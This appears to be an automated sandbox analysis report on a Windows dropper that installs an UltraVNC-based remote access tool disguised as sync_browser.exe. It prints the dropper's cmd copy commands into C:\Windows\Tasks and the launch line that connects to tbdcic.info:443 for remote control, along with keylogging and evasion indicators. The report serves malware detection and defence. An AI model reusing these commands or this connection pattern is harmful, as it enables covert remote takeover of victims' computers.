                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59EA228 __doserrno,_errno,_invalid_parameter_noinfo,_errno,__doserrno,_getdrive,FindFirstFileExA,_errno,_errno,_errno,_errno,_errno,GetDriveTypeA,free,free,_errno,__doserrno,_wsopen_s,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FindClose,GetLastError,FindClose,26_2_00007FF7D59EA228
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D595C210 SetErrorMode,FindFirstFileA,SetErrorMode,FindClose,26_2_00007FF7D595C210
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5956DD1 OpenInputDesktop,CloseDesktop,GetTickCount,GetLogicalDriveStringsA,GetDriveTypeA,SHGetMalloc,SHGetSpecialFolderLocation,SHGetPathFromIDListA,SetErrorMode,FindFirstFileA,SetErrorMode,lstrlenA,FindNextFileA,FindClose,LeaveCriticalSection,21_2_00007FF7D5956DD1
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5936060 GetProcAddress,GetVersion,GetProcAddress,GetSystemInfo,GetSystemInfo,21_2_00007FF7D5936060
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Shutdown Service
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Remote Desktop Virtualization Service
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicshutdown
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Volume Shadow Copy Requestor
                          Source: sync_browser.exe, 00000015.00000002.3448690077.000000000091E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllUS#
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V PowerShell Direct Service
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Time Synchronization Service
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicvss
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Data Exchange Service
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Heartbeat Service
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V Guest Service Interface
                          Source: sync_browser.exe, 0000001A.00000002.2369251582.0000000000FCB000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                          Source: sync_browser.exe, 0000001A.00000002.2369373388.0000000002B55000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: vmicheartbeat
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end nodegraph_21-22234
                          Source: C:\Windows\Tasks\sync_browser.exeAPI call chain: ExitProcess graph end node
                          Source: C:\Windows\Tasks\sync_browser.exeProcess information queried: ProcessInformation
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59F47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF7D59F47E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59426B0 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,WTSGetActiveConsoleSessionId,Sleep,GetLastError,sprintf,OutputDebugStringA,Sleep,FreeLibrary,FreeLibrary,21_2_00007FF7D59426B0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5999BC0 LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,ProcessIdToSessionId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,ProcessIdToSessionId,ProcessIdToSessionId,CloseHandle,FreeLibrary,Process32Next,21_2_00007FF7D5999BC0
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040236F LoadLibraryA,GetProcAddress,GetNativeSystemInfo,0_2_0040236F
                          Source: C:\Windows\SysWOW64\taskkill.exeProcess token adjusted: DebugJump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59F47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,21_2_00007FF7D59F47E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59E7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,21_2_00007FF7D59E7220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59F47E4 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,26_2_00007FF7D59F47E4
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 26_2_00007FF7D59E7220 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,26_2_00007FF7D59E7220
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: LoadLibraryA,GetProcAddress,GetProcAddress,GetSystemMetrics,GetCurrentProcessId,CreateToolhelp32Snapshot,Process32First,CloseHandle,FreeLibrary,CloseHandle,FreeLibrary,Process32Next, explorer.exe26_2_00007FF7D5999BC0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59436C0 GetModuleFileNameA,GetForegroundWindow,ShellExecuteExA,21_2_00007FF7D59436C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59474C0 keybd_event,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,GetKeyState,TryEnterCriticalSection,LeaveCriticalSection,keybd_event,21_2_00007FF7D59474C0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5954D7E OpenInputDesktop,CloseDesktop,GetTickCount,GetSystemMetrics,GetSystemMetrics,mouse_event,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCursorPos,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,SystemParametersInfoA,mouse_event,SystemParametersInfoA,SystemParametersInfoA,21_2_00007FF7D5954D7E
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c copy /y "%CD%\*.*" "%CD%\..\..\..\..\..\..\Windows\Tasks\"Jump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & copy 5482310161066753 5482310161066753.cmdJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c cd C:\Windows\Tasks\ & 5482310161066753.cmdJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe "C:\Program Files\Adobe\Acrobat DC\Acrobat\Acrobat.exe" "C:\Users\user\Downloads\Lom.pdf"Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 1Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exeJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 8Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\Tasks\sync_browser.exe C:\Windows\Tasks\sync_browser.exe -autoreconnect -id:user-PC_Thj0Wf -connect tbdcic.info:443Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 2Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 4Jump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\timeout.exe timeout /t 42Jump to behavior
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5947B90 InitializeSecurityDescriptor,SetSecurityDescriptorDacl,ConvertStringSecurityDescriptorToSecurityDescriptorA,GetLastError,GetSecurityDescriptorSacl,SetSecurityDescriptorSacl,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,CreateFileMappingA,MapViewOfFile,CreateEventA,CreateEventA,21_2_00007FF7D5947B90
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_0040244E AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_0040244E
                          Source: GIjul8.QTIrrr.0.drBinary or memory string: Program ManagerProgmanSHELLDLL_DefViewFolderViewSysListView32BlockInputtimerscreenupdatemouseupdateuser1user2quitrestartvncdesktop.cpp : ~vncDesktop
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: vncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: Location: // basicwinhttp.dllWinHttpGetIEProxyConfigForCurrentUser;http=https==UltraVNC.ini -settingshelperWinsta0\DefaultShell_TrayWndpasswdUltraVNCpasswd2isWritablePermissions{34F673E0-878F-11D5-B98A-57B0D07B8C7C}{34F673E0-878F-11D5-B98A-00B0D07B8C7C}0~
                          Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.drBinary or memory string: Program Manager
                          Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.drBinary or memory string: Shell_TrayWnd
                          Source: sync_browser.exe, sync_browser.exe, 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, GIjul8.QTIrrr.3.dr, sync_browser.exe.7.drBinary or memory string: Progman
                          Source: Olz7TmvkEW.exe, 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, sync_browser.exe, 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, sync_browser.exe, 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmpBinary or memory string: WTSUnRegisterSessionNotificationvncmenu.cpp : ########### Shell_TrayWnd found %i
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: GetLastError,GetLastError,wsprintfW,GetEnvironmentVariableW,GetEnvironmentVariableW,GetLastError,??2@YAPAXI@Z,GetEnvironmentVariableW,GetLastError,lstrcmpiW,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,lstrlenA,??2@YAPAXI@Z,GetLocaleInfoW,_wtol,MultiByteToWideChar,0_2_00402187
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Windows\SysWOW64\cmd.exeQueries volume information: C:\ VolumeInformationJump to behavior
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00401815 ??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLocalTime,SystemTimeToFileTime,??2@YAPAXI@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,GetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,0_2_00401815
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D5999EF0 GetProcessWindowStation,GetUserObjectInformationA,GetLastError,SetLastError,RevertToSelf,GetUserNameA,GetLastError,GetLastError,21_2_00007FF7D5999EF0
                          Source: C:\Windows\Tasks\sync_browser.exeCode function: 21_2_00007FF7D59EDF80 _lock,_get_daylight,_get_daylight,_get_daylight,___lc_codepage_func,free,free,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,21_2_00007FF7D59EDF80
                          Source: C:\Users\user\Desktop\Olz7TmvkEW.exeCode function: 0_2_00405721 ?_set_new_handler@@YAP6AHI@ZP6AHI@Z@Z,GetVersionExW,GetCommandLineW,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetModuleFileNameW,_wtol,??2@YAPAXI@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,wsprintfW,_wtol,GetCommandLineW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetCurrentProcess,SetProcessWorkingSetSize,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,CoInitialize,_wtol,??3@YAXPAX@Z,GetKeyState,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,GetFileAttributesW,??3@YAXPAX@Z,??3@YAXPAX@Z,_wtol,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetLastError,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,SetCurrentDirectoryW,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,??3@YAXPAX@Z,MessageBoxA,0_2_00405721

                          Stealing of Sensitive Information

                          barindex
                          Source: Yara matchFile source: 26.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Olz7TmvkEW.exe PID: 6420, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 7788, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 8224, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED

                          Remote Access Functionality

                          barindex
                          Source: Yara matchFile source: 26.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 26.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.2.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 21.0.sync_browser.exe.7ff7d5930000.0.unpack, type: UNPACKEDPE
                          Source: Yara matchFile source: 0000001A.00000002.2369777951.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000000.2289193498.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2175354129.000000000287B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.2366206876.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.3449669603.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000000.2366282795.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000002.3450039940.00007FF7D5BAC000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2175678289.0000000000ABB000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: 0000001A.00000002.2369623705.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000015.00000000.2289093130.00007FF7D5A09000.00000002.00000001.01000000.00000007.sdmp, type: MEMORY
                          Source: Yara matchFile source: 00000000.00000003.2175354129.00000000026B0000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                          Source: Yara matchFile source: Process Memory Space: Olz7TmvkEW.exe PID: 6420, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 7788, type: MEMORYSTR
                          Source: Yara matchFile source: Process Memory Space: sync_browser.exe PID: 8224, type: MEMORYSTR
                          Source: Yara matchFile source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\GIjul8.QTIrrr, type: DROPPED
                          Source: Yara matchFile source: C:\Windows\Tasks\sync_browser.exe, type: DROPPED
                          Source: sync_browser.exe, 00000015.00000002.3449099877.0000000002590000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          Source: sync_browser.exe, 00000015.00000003.2481657113.000000000259A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: RFB 003.008
                          ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                          Gather Victim Identity InformationAcquire Infrastructure1
                          Valid Accounts
                          1
                          Windows Management Instrumentation
                          1
                          DLL Side-Loading
                          1
                          Exploitation for Privilege Escalation
                          1
                          Deobfuscate/Decode Files or Information
                          121
                          Input Capture
                          2
                          System Time Discovery
                          1
                          Remote Desktop Protocol
                          1
                          Archive Collected Data
                          1
                          Ingress Tool Transfer
                          Exfiltration Over Other Network Medium1
                          System Shutdown/Reboot
                          CredentialsDomainsDefault Accounts2
                          Native API
                          1
                          Valid Accounts
                          1
                          DLL Side-Loading
                          2
                          Obfuscated Files or Information
                          LSASS Memory1
                          Account Discovery
                          Remote Desktop Protocol1
                          Screen Capture
                          12
                          Encrypted Channel
                          Exfiltration Over BluetoothNetwork Denial of Service
                          Email AddressesDNS ServerDomain Accounts2
                          Command and Scripting Interpreter
                          11
                          Windows Service
                          1
                          Valid Accounts
                          1
                          Timestomp
                          Security Account Manager1
                          System Service Discovery
                          SMB/Windows Admin Shares121
                          Input Capture
                          1
                          Remote Access Software
                          Automated ExfiltrationData Encrypted for Impact
                          Employee NamesVirtual Private ServerLocal Accounts1
                          Scheduled Task/Job
                          1
                          Scheduled Task/Job
                          11
                          Access Token Manipulation
                          1
                          DLL Side-Loading
                          NTDS4
                          File and Directory Discovery
                          Distributed Component Object Model3
                          Clipboard Data
                          1
                          Non-Application Layer Protocol
                          Traffic DuplicationData Destruction
                          Gather Victim Network InformationServerCloud Accounts1
                          Service Execution
                          1
                          Bootkit
                          11
                          Windows Service
                          231
                          Masquerading
                          LSA Secrets26
                          System Information Discovery
                          SSHKeylogging2
                          Application Layer Protocol
                          Scheduled TransferData Encrypted for Impact
                          Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts22
                          Process Injection
                          1
                          Valid Accounts
                          Cached Domain Credentials31
                          Security Software Discovery
                          VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                          DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup Items1
                          Scheduled Task/Job
                          1
                          Virtualization/Sandbox Evasion
                          DCSync1
                          Virtualization/Sandbox Evasion
                          Windows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                          Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job11
                          Access Token Manipulation
                          Proc Filesystem3
                          Process Discovery
                          Cloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                          Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt22
                          Process Injection
                          /etc/passwd and /etc/shadow11
                          Application Window Discovery
                          Direct Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                          IP AddressesCompromise InfrastructureSupply Chain CompromisePowerShellCronCron1
                          Bootkit
                          Network Sniffing1
                          System Owner/User Discovery
                          Shared WebrootLocal Data StagingFile Transfer ProtocolsExfiltration Over Asymmetric Encrypted Non-C2 ProtocolExternal Defacement
                          Hide Legend

                          Legend:

                          • Process
                          • Signature
                          • Created File
                          • DNS/IP Info
                          • Is Dropped
                          • Is Windows Process
                          • Number of created Registry Values
                          • Number of created Files
                          • Visual Basic
                          • Delphi
                          • Java
                          • .Net C# or VB.NET
                          • C, C++ or other language
                          • Is malicious
                          • Internet
                          behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1579877 Sample: Olz7TmvkEW.exe Startdate: 23/12/2024 Architecture: WINDOWS Score: 84 52 tbdcic.info 2->52 54 x1.i.lencr.org 2->54 56 3 other IPs or domains 2->56 60 Icon mismatch, binary includes an icon from a different legit application in order to fool users 2->60 62 Yara detected UltraVNC Hacktool 2->62 64 AI detected suspicious sample 2->64 66 3 other signatures 2->66 10 Olz7TmvkEW.exe 8 2->10         started        signatures3 process4 file5 40 C:\Users\user\AppData\Local\...behaviorgraphIjul8.QTIrrr, PE32+ 10->40 dropped 42 C:\Users\user\AppData\Local\...\sdABZ4.E1924R, PE32+ 10->42 dropped 70 Contains functionality to register a low level keyboard hook 10->70 14 cmd.exe 3 6 10->14         started        18 cmd.exe 6 10->18         started        20 cmd.exe 2 10->20         started        signatures6 process7 file8 44 C:\Windows\Tasks\sync_browser.exe, PE32+ 14->44 dropped 46 C:\Windows\Tasks\conhost.exe, PE32+ 14->46 dropped 72 Drops executables to the windows directory (C:\Windows) and starts them 14->72 22 sync_browser.exe 14->22         started        26 Acrobat.exe 20 71 14->26         started        28 taskkill.exe 1 14->28         started        34 11 other processes 14->34 48 C:\Windows\TasksbehaviorgraphIjul8.QTIrrr, PE32+ 18->48 dropped 50 C:\Windows\Tasks\sdABZ4.E1924R, PE32+ 18->50 dropped 30 conhost.exe 18->30         started        32 conhost.exe 20->32         started        signatures9 process10 dnsIp11 58 tbdcic.info 194.190.152.201, 443, 49781, 49782 RSHB-ASRU Russian Federation 22->58 68 Contains VNC / remote desktop functionality (version string found) 22->68 36 AcroCEF.exe 107 26->36         started        signatures12 process13 process14 38 AcroCEF.exe 2 36->38         started       

                          This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                          windows-stand
                          SourceDetectionScannerLabelLink
                          Olz7TmvkEW.exe3%ReversingLabs
                          SourceDetectionScannerLabelLink
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\GIjul8.QTIrrr0%ReversingLabs
                          C:\Users\user\AppData\Local\Temp\7ZipSfx.000\sdABZ4.E1924R0%ReversingLabs
                          C:\Windows\Tasks\GIjul8.QTIrrr0%ReversingLabs
                          C:\Windows\Tasks\conhost.exe0%ReversingLabs
                          C:\Windows\Tasks\sdABZ4.E1924R0%ReversingLabs
                          C:\Windows\Tasks\sync_browser.exe0%ReversingLabs
                          No Antivirus matches
                          No Antivirus matches
                          No Antivirus matches
                          NameIPActiveMaliciousAntivirus DetectionReputation
                          tbdcic.info
                          194.190.152.201
                          truetrue
                            unknown
                            bg.microsoft.map.fastly.net
                            199.232.210.172
                            truefalse
                              high
                              ax-0001.ax-msedge.net
                              150.171.27.10
                              truefalse
                                high
                                x1.i.lencr.org
                                unknown
                                unknownfalse
                                  high
                                  NameSourceMaliciousAntivirus DetectionReputation
